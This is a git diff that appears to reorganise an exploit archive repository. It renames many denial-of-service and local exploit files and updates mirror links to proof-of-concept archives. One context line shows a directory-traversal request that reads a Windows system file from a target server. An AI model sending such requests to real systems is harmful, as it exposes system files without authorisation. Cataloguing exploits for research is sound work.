b/exploits/multiple/dos/43174.html similarity index 100% rename from platforms/multiple/dos/43174.html rename to exploits/multiple/dos/43174.html diff --git a/platforms/multiple/dos/43175.html b/exploits/multiple/dos/43175.html similarity index 100% rename from platforms/multiple/dos/43175.html rename to exploits/multiple/dos/43175.html diff --git a/platforms/multiple/dos/43176.html b/exploits/multiple/dos/43176.html similarity index 100% rename from platforms/multiple/dos/43176.html rename to exploits/multiple/dos/43176.html diff --git a/platforms/multiple/dos/433.c b/exploits/multiple/dos/433.c similarity index 100% rename from platforms/multiple/dos/433.c rename to exploits/multiple/dos/433.c diff --git a/platforms/multiple/dos/4359.txt b/exploits/multiple/dos/4359.txt similarity index 100% rename from platforms/multiple/dos/4359.txt rename to exploits/multiple/dos/4359.txt diff --git a/platforms/multiple/dos/4432.html b/exploits/multiple/dos/4432.html similarity index 100% rename from platforms/multiple/dos/4432.html rename to exploits/multiple/dos/4432.html diff --git a/platforms/multiple/dos/4540.pl b/exploits/multiple/dos/4540.pl similarity index 100% rename from platforms/multiple/dos/4540.pl rename to exploits/multiple/dos/4540.pl diff --git a/platforms/multiple/dos/4559.txt b/exploits/multiple/dos/4559.txt similarity index 100% rename from platforms/multiple/dos/4559.txt rename to exploits/multiple/dos/4559.txt diff --git a/platforms/multiple/dos/4560.pl b/exploits/multiple/dos/4560.pl similarity index 100% rename from platforms/multiple/dos/4560.pl rename to exploits/multiple/dos/4560.pl diff --git a/platforms/multiple/dos/4601.txt b/exploits/multiple/dos/4601.txt similarity index 67% rename from platforms/multiple/dos/4601.txt rename to exploits/multiple/dos/4601.txt index a3754bb1e..9343040e2 100644 --- a/platforms/multiple/dos/4601.txt +++ b/exploits/multiple/dos/4601.txt @@ -1,6 +1,6 @@ Ubuntu 6.06 DHCPd bug Remote Denial of Service Exploit Author: RoMaNSoFt -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz) +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/4601.tgz (1022007-DoS-CVE-2007-5365.tgz) # milw0rm.com [2007-11-02] \ No newline at end of file diff --git a/platforms/multiple/dos/4615.txt b/exploits/multiple/dos/4615.txt similarity index 100% rename from platforms/multiple/dos/4615.txt rename to exploits/multiple/dos/4615.txt diff --git a/platforms/multiple/dos/4648.py b/exploits/multiple/dos/4648.py similarity index 100% rename from platforms/multiple/dos/4648.py rename to exploits/multiple/dos/4648.py diff --git a/platforms/multiple/dos/4773.pl b/exploits/multiple/dos/4773.pl similarity index 100% rename from platforms/multiple/dos/4773.pl rename to exploits/multiple/dos/4773.pl diff --git a/platforms/multiple/dos/4856.php b/exploits/multiple/dos/4856.php similarity index 100% rename from platforms/multiple/dos/4856.php rename to exploits/multiple/dos/4856.php diff --git a/platforms/multiple/dos/4878.pl b/exploits/multiple/dos/4878.pl similarity index 100% rename from platforms/multiple/dos/4878.pl rename to exploits/multiple/dos/4878.pl diff --git a/platforms/multiple/dos/4997.sql b/exploits/multiple/dos/4997.sql similarity index 100% rename from platforms/multiple/dos/4997.sql rename to exploits/multiple/dos/4997.sql diff --git a/platforms/multiple/dos/5152.sh b/exploits/multiple/dos/5152.sh similarity index 100% rename from platforms/multiple/dos/5152.sh rename to exploits/multiple/dos/5152.sh diff --git a/platforms/multiple/dos/5191.c b/exploits/multiple/dos/5191.c similarity index 100% rename from platforms/multiple/dos/5191.c rename to exploits/multiple/dos/5191.c diff --git a/platforms/multiple/dos/5229.txt b/exploits/multiple/dos/5229.txt similarity index 95% rename from platforms/multiple/dos/5229.txt rename to exploits/multiple/dos/5229.txt index 84e0e91fe..0a3832a43 100644 --- a/platforms/multiple/dos/5229.txt +++ b/exploits/multiple/dos/5229.txt @@ -112,7 +112,7 @@ to write to the log file (max 1023 bytes) in a buffer of only 500. http://aluigi.org/poc/asgulo.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5229.zip (2008-asgulo.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5229.zip (2008-asgulo.zip) A] http://SERVER:6161/snmx-cgi/fcheck.exe?-b+..\../..\boot.ini diff --git a/platforms/multiple/dos/5268.html b/exploits/multiple/dos/5268.html similarity index 100% rename from platforms/multiple/dos/5268.html rename to exploits/multiple/dos/5268.html diff --git a/platforms/multiple/dos/5306.txt b/exploits/multiple/dos/5306.txt similarity index 100% rename from platforms/multiple/dos/5306.txt rename to exploits/multiple/dos/5306.txt diff --git a/platforms/multiple/dos/5679.php b/exploits/multiple/dos/5679.php similarity index 100% rename from platforms/multiple/dos/5679.php rename to exploits/multiple/dos/5679.php diff --git a/platforms/multiple/dos/5712.pl b/exploits/multiple/dos/5712.pl similarity index 100% rename from platforms/multiple/dos/5712.pl rename to exploits/multiple/dos/5712.pl diff --git a/platforms/multiple/dos/5749.pl b/exploits/multiple/dos/5749.pl similarity index 100% rename from platforms/multiple/dos/5749.pl rename to exploits/multiple/dos/5749.pl diff --git a/platforms/multiple/dos/6029.txt b/exploits/multiple/dos/6029.txt similarity index 84% rename from platforms/multiple/dos/6029.txt rename to exploits/multiple/dos/6029.txt index 81731b01a..d09481b9d 100644 --- a/platforms/multiple/dos/6029.txt +++ b/exploits/multiple/dos/6029.txt @@ -12,6 +12,6 @@ Microsoft Visio on windows: unaffected It is unknown at this time whether code execution is possible... """ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6029.zip (2008-www.NoiseBridge.net.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/6029.zip (2008-www.NoiseBridge.net.zip) # milw0rm.com [2008-07-08] \ No newline at end of file diff --git a/platforms/multiple/dos/6046.txt b/exploits/multiple/dos/6046.txt similarity index 100% rename from platforms/multiple/dos/6046.txt rename to exploits/multiple/dos/6046.txt diff --git a/platforms/multiple/dos/6101.py b/exploits/multiple/dos/6101.py similarity index 100% rename from platforms/multiple/dos/6101.py rename to exploits/multiple/dos/6101.py diff --git a/platforms/multiple/dos/6174.txt b/exploits/multiple/dos/6174.txt similarity index 89% rename from platforms/multiple/dos/6174.txt rename to exploits/multiple/dos/6174.txt index 0056b5170..ad31c5dba 100644 --- a/platforms/multiple/dos/6174.txt +++ b/exploits/multiple/dos/6174.txt @@ -17,6 +17,6 @@ your scanner hanging, woops. -- kokanin -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6174.zip (2008-snot.zip.bla) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/6174.zip (2008-snot.zip.bla) # milw0rm.com [2008-07-31] \ No newline at end of file diff --git a/platforms/multiple/dos/6218.txt b/exploits/multiple/dos/6218.txt similarity index 100% rename from platforms/multiple/dos/6218.txt rename to exploits/multiple/dos/6218.txt diff --git a/platforms/multiple/dos/6237.txt b/exploits/multiple/dos/6237.txt similarity index 65% rename from platforms/multiple/dos/6237.txt rename to exploits/multiple/dos/6237.txt index 0fdf93955..06a0ecaaa 100644 --- a/platforms/multiple/dos/6237.txt +++ b/exploits/multiple/dos/6237.txt @@ -1,5 +1,5 @@ NULL pointer in Ventrilo 3.0.2 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6237.zip (2008-ventrilobotomy.zip) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/6237.zip (2008-ventrilobotomy.zip) # milw0rm.com [2008-08-13] \ No newline at end of file diff --git a/platforms/multiple/dos/6239.txt b/exploits/multiple/dos/6239.txt similarity index 100% rename from platforms/multiple/dos/6239.txt rename to exploits/multiple/dos/6239.txt diff --git a/platforms/multiple/dos/6252.txt b/exploits/multiple/dos/6252.txt similarity index 94% rename from platforms/multiple/dos/6252.txt rename to exploits/multiple/dos/6252.txt index ebc39f28a..364070cfb 100644 --- a/platforms/multiple/dos/6252.txt +++ b/exploits/multiple/dos/6252.txt @@ -56,7 +56,7 @@ Credit : g_ (g_ # orange-bat # com) http://www.orange-bat.com/adv/2008/vlc.dos.tta -backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6252.tta (2008-vlc.dos.tta) +backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/6252.tta (2008-vlc.dos.tta) - - PGP - diff --git a/platforms/multiple/dos/6293.txt b/exploits/multiple/dos/6293.txt similarity index 100% rename from platforms/multiple/dos/6293.txt rename to exploits/multiple/dos/6293.txt diff --git a/platforms/multiple/dos/6471.pl b/exploits/multiple/dos/6471.pl similarity index 100% rename from platforms/multiple/dos/6471.pl rename to exploits/multiple/dos/6471.pl diff --git a/platforms/multiple/dos/6472.c b/exploits/multiple/dos/6472.c similarity index 100% rename from platforms/multiple/dos/6472.c rename to exploits/multiple/dos/6472.c diff --git a/platforms/multiple/dos/6622.txt b/exploits/multiple/dos/6622.txt similarity index 85% rename from platforms/multiple/dos/6622.txt rename to exploits/multiple/dos/6622.txt index 23eae3536..de289ecca 100644 --- a/platforms/multiple/dos/6622.txt +++ b/exploits/multiple/dos/6622.txt @@ -8,6 +8,6 @@ with a malformed Tamosoft CommView .ncf packet capture: Err file wtap.c: line 620 (wtap_read): assertion failed: (wth->phdr.pkt_encap != WTAP_ENCAP_PER_PACKET) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6622.ncf (2008-wireshark.ncf) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/6622.ncf (2008-wireshark.ncf) # milw0rm.com [2008-09-29] \ No newline at end of file diff --git a/platforms/multiple/dos/6805.txt b/exploits/multiple/dos/6805.txt similarity index 100% rename from platforms/multiple/dos/6805.txt rename to exploits/multiple/dos/6805.txt diff --git a/platforms/multiple/dos/7330.c b/exploits/multiple/dos/7330.c similarity index 100% rename from platforms/multiple/dos/7330.c rename to exploits/multiple/dos/7330.c diff --git a/platforms/multiple/dos/7467.txt b/exploits/multiple/dos/7467.txt similarity index 100% rename from platforms/multiple/dos/7467.txt rename to exploits/multiple/dos/7467.txt diff --git a/platforms/multiple/dos/7520.c b/exploits/multiple/dos/7520.c similarity index 100% rename from platforms/multiple/dos/7520.c rename to exploits/multiple/dos/7520.c diff --git a/platforms/multiple/dos/7555.py b/exploits/multiple/dos/7555.py similarity index 100% rename from platforms/multiple/dos/7555.py rename to exploits/multiple/dos/7555.py diff --git a/platforms/multiple/dos/7564.pl b/exploits/multiple/dos/7564.pl similarity index 100% rename from platforms/multiple/dos/7564.pl rename to exploits/multiple/dos/7564.pl diff --git a/platforms/multiple/dos/7643.txt b/exploits/multiple/dos/7643.txt similarity index 100% rename from platforms/multiple/dos/7643.txt rename to exploits/multiple/dos/7643.txt diff --git a/platforms/multiple/dos/7647.txt b/exploits/multiple/dos/7647.txt similarity index 100% rename from platforms/multiple/dos/7647.txt rename to exploits/multiple/dos/7647.txt diff --git a/platforms/multiple/dos/7673.html b/exploits/multiple/dos/7673.html similarity index 100% rename from platforms/multiple/dos/7673.html rename to exploits/multiple/dos/7673.html diff --git a/platforms/multiple/dos/7685.pl b/exploits/multiple/dos/7685.pl similarity index 100% rename from platforms/multiple/dos/7685.pl rename to exploits/multiple/dos/7685.pl diff --git a/platforms/multiple/dos/7785.py b/exploits/multiple/dos/7785.py similarity index 100% rename from platforms/multiple/dos/7785.py rename to exploits/multiple/dos/7785.py diff --git a/platforms/multiple/dos/7812.pl b/exploits/multiple/dos/7812.pl similarity index 100% rename from platforms/multiple/dos/7812.pl rename to exploits/multiple/dos/7812.pl diff --git a/platforms/multiple/dos/7822.c b/exploits/multiple/dos/7822.c similarity index 100% rename from platforms/multiple/dos/7822.c rename to exploits/multiple/dos/7822.c diff --git a/platforms/multiple/dos/8021.pl b/exploits/multiple/dos/8021.pl similarity index 100% rename from platforms/multiple/dos/8021.pl rename to exploits/multiple/dos/8021.pl diff --git a/platforms/multiple/dos/8091.html b/exploits/multiple/dos/8091.html similarity index 100% rename from platforms/multiple/dos/8091.html rename to exploits/multiple/dos/8091.html diff --git a/platforms/multiple/dos/8148.pl b/exploits/multiple/dos/8148.pl similarity index 100% rename from platforms/multiple/dos/8148.pl rename to exploits/multiple/dos/8148.pl diff --git a/platforms/multiple/dos/8219.html b/exploits/multiple/dos/8219.html similarity index 100% rename from platforms/multiple/dos/8219.html rename to exploits/multiple/dos/8219.html diff --git a/platforms/multiple/dos/8241.txt b/exploits/multiple/dos/8241.txt similarity index 100% rename from platforms/multiple/dos/8241.txt rename to exploits/multiple/dos/8241.txt diff --git a/platforms/multiple/dos/8245.c b/exploits/multiple/dos/8245.c similarity index 100% rename from platforms/multiple/dos/8245.c rename to exploits/multiple/dos/8245.c diff --git a/platforms/multiple/dos/8285.txt b/exploits/multiple/dos/8285.txt similarity index 73% rename from platforms/multiple/dos/8285.txt rename to exploits/multiple/dos/8285.txt index 563d3bf44..80fc453b9 100644 --- a/platforms/multiple/dos/8285.txt +++ b/exploits/multiple/dos/8285.txt @@ -2,6 +2,6 @@ // k`sOSe - works both in windows and linux -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8285.tar.gz (2009-ffox-poc.tar.gz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/8285.tar.gz (2009-ffox-poc.tar.gz) # milw0rm.com [2009-03-25] \ No newline at end of file diff --git a/platforms/multiple/dos/8308.c b/exploits/multiple/dos/8308.c similarity index 100% rename from platforms/multiple/dos/8308.c rename to exploits/multiple/dos/8308.c diff --git a/platforms/multiple/dos/8320.py b/exploits/multiple/dos/8320.py similarity index 100% rename from platforms/multiple/dos/8320.py rename to exploits/multiple/dos/8320.py diff --git a/platforms/multiple/dos/8333.txt b/exploits/multiple/dos/8333.txt similarity index 100% rename from platforms/multiple/dos/8333.txt rename to exploits/multiple/dos/8333.txt diff --git a/platforms/multiple/dos/8337.c b/exploits/multiple/dos/8337.c similarity index 100% rename from platforms/multiple/dos/8337.c rename to exploits/multiple/dos/8337.c diff --git a/platforms/multiple/dos/8344.py b/exploits/multiple/dos/8344.py similarity index 100% rename from platforms/multiple/dos/8344.py rename to exploits/multiple/dos/8344.py diff --git a/platforms/multiple/dos/8345.py b/exploits/multiple/dos/8345.py similarity index 100% rename from platforms/multiple/dos/8345.py rename to exploits/multiple/dos/8345.py diff --git a/platforms/multiple/dos/838.pl b/exploits/multiple/dos/838.pl similarity index 100% rename from platforms/multiple/dos/838.pl rename to exploits/multiple/dos/838.pl diff --git a/platforms/multiple/dos/8429.pl b/exploits/multiple/dos/8429.pl similarity index 100% rename from platforms/multiple/dos/8429.pl rename to exploits/multiple/dos/8429.pl diff --git a/platforms/multiple/dos/855.pl b/exploits/multiple/dos/855.pl similarity index 100% rename from platforms/multiple/dos/855.pl rename to exploits/multiple/dos/855.pl diff --git a/platforms/multiple/dos/8646.php b/exploits/multiple/dos/8646.php similarity index 100% rename from platforms/multiple/dos/8646.php rename to exploits/multiple/dos/8646.php diff --git a/platforms/multiple/dos/8669.c b/exploits/multiple/dos/8669.c similarity index 100% rename from platforms/multiple/dos/8669.c rename to exploits/multiple/dos/8669.c diff --git a/platforms/multiple/dos/867.c b/exploits/multiple/dos/867.c similarity index 100% rename from platforms/multiple/dos/867.c rename to exploits/multiple/dos/867.c diff --git a/platforms/multiple/dos/8695.txt b/exploits/multiple/dos/8695.txt similarity index 100% rename from platforms/multiple/dos/8695.txt rename to exploits/multiple/dos/8695.txt diff --git a/platforms/multiple/dos/8720.c b/exploits/multiple/dos/8720.c similarity index 100% rename from platforms/multiple/dos/8720.c rename to exploits/multiple/dos/8720.c diff --git a/platforms/multiple/dos/8794.html b/exploits/multiple/dos/8794.html similarity index 100% rename from platforms/multiple/dos/8794.html rename to exploits/multiple/dos/8794.html diff --git a/platforms/multiple/dos/880.pl b/exploits/multiple/dos/880.pl similarity index 100% rename from platforms/multiple/dos/880.pl rename to exploits/multiple/dos/880.pl diff --git a/platforms/multiple/dos/8822.txt b/exploits/multiple/dos/8822.txt similarity index 100% rename from platforms/multiple/dos/8822.txt rename to exploits/multiple/dos/8822.txt diff --git a/platforms/multiple/dos/8826.txt b/exploits/multiple/dos/8826.txt similarity index 66% rename from platforms/multiple/dos/8826.txt rename to exploits/multiple/dos/8826.txt index 1ccca6c84..3fd26355f 100644 --- a/platforms/multiple/dos/8826.txt +++ b/exploits/multiple/dos/8826.txt @@ -1,5 +1,5 @@ Acrobat <= 9.1.1 Stack Overflow Crashy PoC -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8826.pdf (2009-crashy_the_clown.pdf) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/8826.pdf (2009-crashy_the_clown.pdf) # milw0rm.com [2009-05-29] \ No newline at end of file diff --git a/platforms/multiple/dos/8842.pl b/exploits/multiple/dos/8842.pl similarity index 100% rename from platforms/multiple/dos/8842.pl rename to exploits/multiple/dos/8842.pl diff --git a/platforms/multiple/dos/8873.c b/exploits/multiple/dos/8873.c similarity index 100% rename from platforms/multiple/dos/8873.c rename to exploits/multiple/dos/8873.c diff --git a/platforms/multiple/dos/8940.pl b/exploits/multiple/dos/8940.pl similarity index 100% rename from platforms/multiple/dos/8940.pl rename to exploits/multiple/dos/8940.pl diff --git a/platforms/multiple/dos/8957.txt b/exploits/multiple/dos/8957.txt similarity index 100% rename from platforms/multiple/dos/8957.txt rename to exploits/multiple/dos/8957.txt diff --git a/platforms/multiple/dos/8976.pl b/exploits/multiple/dos/8976.pl similarity index 100% rename from platforms/multiple/dos/8976.pl rename to exploits/multiple/dos/8976.pl diff --git a/platforms/multiple/dos/8991.php b/exploits/multiple/dos/8991.php similarity index 100% rename from platforms/multiple/dos/8991.php rename to exploits/multiple/dos/8991.php diff --git a/platforms/multiple/dos/9071.txt b/exploits/multiple/dos/9071.txt similarity index 100% rename from platforms/multiple/dos/9071.txt rename to exploits/multiple/dos/9071.txt diff --git a/platforms/multiple/dos/9085.txt b/exploits/multiple/dos/9085.txt similarity index 100% rename from platforms/multiple/dos/9085.txt rename to exploits/multiple/dos/9085.txt diff --git a/platforms/multiple/dos/9160.txt b/exploits/multiple/dos/9160.txt similarity index 100% rename from platforms/multiple/dos/9160.txt rename to exploits/multiple/dos/9160.txt diff --git a/platforms/multiple/dos/9175.txt b/exploits/multiple/dos/9175.txt similarity index 100% rename from platforms/multiple/dos/9175.txt rename to exploits/multiple/dos/9175.txt diff --git a/platforms/multiple/dos/9198.txt b/exploits/multiple/dos/9198.txt similarity index 100% rename from platforms/multiple/dos/9198.txt rename to exploits/multiple/dos/9198.txt diff --git a/platforms/multiple/dos/9300.c b/exploits/multiple/dos/9300.c similarity index 100% rename from platforms/multiple/dos/9300.c rename to exploits/multiple/dos/9300.c diff --git a/platforms/multiple/dos/9323.txt b/exploits/multiple/dos/9323.txt similarity index 100% rename from platforms/multiple/dos/9323.txt rename to exploits/multiple/dos/9323.txt diff --git a/platforms/multiple/dos/94.c b/exploits/multiple/dos/94.c similarity index 100% rename from platforms/multiple/dos/94.c rename to exploits/multiple/dos/94.c diff --git a/platforms/multiple/dos/9454.txt b/exploits/multiple/dos/9454.txt similarity index 100% rename from platforms/multiple/dos/9454.txt rename to exploits/multiple/dos/9454.txt diff --git a/platforms/multiple/dos/946.c b/exploits/multiple/dos/946.c similarity index 100% rename from platforms/multiple/dos/946.c rename to exploits/multiple/dos/946.c diff --git a/platforms/multiple/dos/948.c b/exploits/multiple/dos/948.c similarity index 100% rename from platforms/multiple/dos/948.c rename to exploits/multiple/dos/948.c diff --git a/platforms/multiple/dos/956.c b/exploits/multiple/dos/956.c similarity index 100% rename from platforms/multiple/dos/956.c rename to exploits/multiple/dos/956.c diff --git a/platforms/multiple/dos/9642.py b/exploits/multiple/dos/9642.py similarity index 100% rename from platforms/multiple/dos/9642.py rename to exploits/multiple/dos/9642.py diff --git a/platforms/multiple/dos/9731.txt b/exploits/multiple/dos/9731.txt similarity index 76% rename from platforms/multiple/dos/9731.txt rename to exploits/multiple/dos/9731.txt index 45efda523..2b2de9ae3 100644 --- a/platforms/multiple/dos/9731.txt +++ b/exploits/multiple/dos/9731.txt @@ -20,5 +20,5 @@ snort-2.8.4 snort-2.8.5.beta* link: http://pablo-secdev.blogspot.com/2009/09/snort-28-285stable-unified1-output-bug.html -poc: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/2009-snort-unified1_bug.tar.gz +poc: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/2009-snort-unified1_bug.tar.gz # milw0rm.com [2009-09-21] \ No newline at end of file diff --git a/platforms/multiple/dos/984.c b/exploits/multiple/dos/984.c similarity index 100% rename from platforms/multiple/dos/984.c rename to exploits/multiple/dos/984.c diff --git a/platforms/multiple/dos/9969.txt b/exploits/multiple/dos/9969.txt similarity index 100% rename from platforms/multiple/dos/9969.txt rename to exploits/multiple/dos/9969.txt diff --git a/platforms/multiple/dos/9987.txt b/exploits/multiple/dos/9987.txt similarity index 100% rename from platforms/multiple/dos/9987.txt rename to exploits/multiple/dos/9987.txt diff --git a/platforms/multiple/local/10072.c b/exploits/multiple/local/10072.c similarity index 100% rename from platforms/multiple/local/10072.c rename to exploits/multiple/local/10072.c diff --git a/platforms/multiple/local/10207.txt b/exploits/multiple/local/10207.txt similarity index 94% rename from platforms/multiple/local/10207.txt rename to exploits/multiple/local/10207.txt index 1ca66ad9c..746e2619e 100644 --- a/platforms/multiple/local/10207.txt +++ b/exploits/multiple/local/10207.txt @@ -121,4 +121,4 @@ VMWare ESX Server 4.0 ESX400-200909401 VMWare ESX Server 3.5 ESX350-200910401 VMWare ACE 2.5.3 Build 185404 -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz) \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10207.tar.gz (2009-11-22-vmware86.tar.gz) \ No newline at end of file diff --git a/platforms/multiple/local/10264.txt b/exploits/multiple/local/10264.txt similarity index 100% rename from platforms/multiple/local/10264.txt rename to exploits/multiple/local/10264.txt diff --git a/platforms/multiple/local/10265.txt b/exploits/multiple/local/10265.txt similarity index 100% rename from platforms/multiple/local/10265.txt rename to exploits/multiple/local/10265.txt diff --git a/platforms/multiple/local/10266.txt b/exploits/multiple/local/10266.txt similarity index 100% rename from platforms/multiple/local/10266.txt rename to exploits/multiple/local/10266.txt diff --git a/platforms/multiple/local/10267.txt b/exploits/multiple/local/10267.txt similarity index 100% rename from platforms/multiple/local/10267.txt rename to exploits/multiple/local/10267.txt diff --git a/platforms/multiple/local/10268.txt b/exploits/multiple/local/10268.txt similarity index 100% rename from platforms/multiple/local/10268.txt rename to exploits/multiple/local/10268.txt diff --git a/platforms/multiple/local/10326.txt b/exploits/multiple/local/10326.txt similarity index 95% rename from platforms/multiple/local/10326.txt rename to exploits/multiple/local/10326.txt index dd75f4b92..fd29ebc64 100644 --- a/platforms/multiple/local/10326.txt +++ b/exploits/multiple/local/10326.txt @@ -114,4 +114,4 @@ Ghostscript Ghostscript 8.56 Ghostscript Ghostscript 8.54 Ghostscript Ghostscript 8.15 -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10326.ps (2009-12-05-34340.ps) \ No newline at end of file +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/10326.ps (2009-12-05-34340.ps) \ No newline at end of file diff --git a/platforms/multiple/local/10544.html b/exploits/multiple/local/10544.html similarity index 100% rename from platforms/multiple/local/10544.html rename to exploits/multiple/local/10544.html diff --git a/platforms/multiple/local/11029.txt b/exploits/multiple/local/11029.txt similarity index 100% rename from platforms/multiple/local/11029.txt rename to exploits/multiple/local/11029.txt diff --git a/platforms/multiple/local/1119.txt b/exploits/multiple/local/1119.txt similarity index 100% rename from platforms/multiple/local/1119.txt rename to exploits/multiple/local/1119.txt diff --git a/platforms/multiple/local/11364.txt b/exploits/multiple/local/11364.txt similarity index 100% rename from platforms/multiple/local/11364.txt rename to exploits/multiple/local/11364.txt diff --git a/platforms/multiple/local/11491.rb b/exploits/multiple/local/11491.rb similarity index 100% rename from platforms/multiple/local/11491.rb rename to exploits/multiple/local/11491.rb diff --git a/platforms/multiple/local/11561.html b/exploits/multiple/local/11561.html similarity index 100% rename from platforms/multiple/local/11561.html rename to exploits/multiple/local/11561.html diff --git a/platforms/multiple/local/11651.sh b/exploits/multiple/local/11651.sh similarity index 100% rename from platforms/multiple/local/11651.sh rename to exploits/multiple/local/11651.sh diff --git a/platforms/multiple/local/11789.c b/exploits/multiple/local/11789.c similarity index 100% rename from platforms/multiple/local/11789.c rename to exploits/multiple/local/11789.c diff --git a/platforms/multiple/local/12103.txt b/exploits/multiple/local/12103.txt similarity index 100% rename from platforms/multiple/local/12103.txt rename to exploits/multiple/local/12103.txt diff --git a/platforms/multiple/local/15475.txt b/exploits/multiple/local/15475.txt similarity index 100% rename from platforms/multiple/local/15475.txt rename to exploits/multiple/local/15475.txt diff --git a/platforms/multiple/local/1554.c b/exploits/multiple/local/1554.c similarity index 100% rename from platforms/multiple/local/1554.c rename to exploits/multiple/local/1554.c diff --git a/platforms/multiple/local/16307.rb b/exploits/multiple/local/16307.rb similarity index 100% rename from platforms/multiple/local/16307.rb rename to exploits/multiple/local/16307.rb diff --git a/platforms/multiple/local/1719.txt b/exploits/multiple/local/1719.txt similarity index 100% rename from platforms/multiple/local/1719.txt rename to exploits/multiple/local/1719.txt diff --git a/platforms/multiple/local/17318.php b/exploits/multiple/local/17318.php similarity index 100% rename from platforms/multiple/local/17318.php rename to exploits/multiple/local/17318.php diff --git a/platforms/multiple/local/17486.php b/exploits/multiple/local/17486.php similarity index 100% rename from platforms/multiple/local/17486.php rename to exploits/multiple/local/17486.php diff --git a/platforms/multiple/local/18959.txt b/exploits/multiple/local/18959.txt similarity index 100% rename from platforms/multiple/local/18959.txt rename to exploits/multiple/local/18959.txt diff --git a/platforms/multiple/local/19139.py b/exploits/multiple/local/19139.py similarity index 100% rename from platforms/multiple/local/19139.py rename to exploits/multiple/local/19139.py diff --git a/platforms/multiple/local/1924.txt b/exploits/multiple/local/1924.txt similarity index 100% rename from platforms/multiple/local/1924.txt rename to exploits/multiple/local/1924.txt diff --git a/platforms/multiple/local/19430.txt b/exploits/multiple/local/19430.txt similarity index 100% rename from platforms/multiple/local/19430.txt rename to exploits/multiple/local/19430.txt diff --git a/platforms/multiple/local/19447.c b/exploits/multiple/local/19447.c similarity index 100% rename from platforms/multiple/local/19447.c rename to exploits/multiple/local/19447.c diff --git a/platforms/multiple/local/19460.sh b/exploits/multiple/local/19460.sh similarity index 100% rename from platforms/multiple/local/19460.sh rename to exploits/multiple/local/19460.sh diff --git a/platforms/multiple/local/19461.c b/exploits/multiple/local/19461.c similarity index 100% rename from platforms/multiple/local/19461.c rename to exploits/multiple/local/19461.c diff --git a/platforms/multiple/local/19480.c b/exploits/multiple/local/19480.c similarity index 100% rename from platforms/multiple/local/19480.c rename to exploits/multiple/local/19480.c diff --git a/platforms/multiple/local/19497.c b/exploits/multiple/local/19497.c similarity index 100% rename from platforms/multiple/local/19497.c rename to exploits/multiple/local/19497.c diff --git a/platforms/multiple/local/19498.sh b/exploits/multiple/local/19498.sh similarity index 100% rename from platforms/multiple/local/19498.sh rename to exploits/multiple/local/19498.sh diff --git a/platforms/multiple/local/19546.pl b/exploits/multiple/local/19546.pl similarity index 100% rename from platforms/multiple/local/19546.pl rename to exploits/multiple/local/19546.pl diff --git a/platforms/multiple/local/19547.txt b/exploits/multiple/local/19547.txt similarity index 88% rename from platforms/multiple/local/19547.txt rename to exploits/multiple/local/19547.txt index 37e522987..e7892eef0 100644 --- a/platforms/multiple/local/19547.txt +++ b/exploits/multiple/local/19547.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/708/info Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19547.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19547.tgz \ No newline at end of file diff --git a/platforms/multiple/local/19551.c b/exploits/multiple/local/19551.c similarity index 100% rename from platforms/multiple/local/19551.c rename to exploits/multiple/local/19551.c diff --git a/platforms/multiple/local/19552.c b/exploits/multiple/local/19552.c similarity index 100% rename from platforms/multiple/local/19552.c rename to exploits/multiple/local/19552.c diff --git a/platforms/multiple/local/19556.sh b/exploits/multiple/local/19556.sh similarity index 100% rename from platforms/multiple/local/19556.sh rename to exploits/multiple/local/19556.sh diff --git a/platforms/multiple/local/19684.c b/exploits/multiple/local/19684.c similarity index 100% rename from platforms/multiple/local/19684.c rename to exploits/multiple/local/19684.c diff --git a/platforms/multiple/local/19692.c b/exploits/multiple/local/19692.c similarity index 100% rename from platforms/multiple/local/19692.c rename to exploits/multiple/local/19692.c diff --git a/platforms/multiple/local/19704.sh b/exploits/multiple/local/19704.sh similarity index 100% rename from platforms/multiple/local/19704.sh rename to exploits/multiple/local/19704.sh diff --git a/platforms/multiple/local/19721.txt b/exploits/multiple/local/19721.txt similarity index 100% rename from platforms/multiple/local/19721.txt rename to exploits/multiple/local/19721.txt diff --git a/platforms/multiple/local/19796.c b/exploits/multiple/local/19796.c similarity index 100% rename from platforms/multiple/local/19796.c rename to exploits/multiple/local/19796.c diff --git a/platforms/multiple/local/19821.c b/exploits/multiple/local/19821.c similarity index 100% rename from platforms/multiple/local/19821.c rename to exploits/multiple/local/19821.c diff --git a/platforms/multiple/local/19912.txt b/exploits/multiple/local/19912.txt 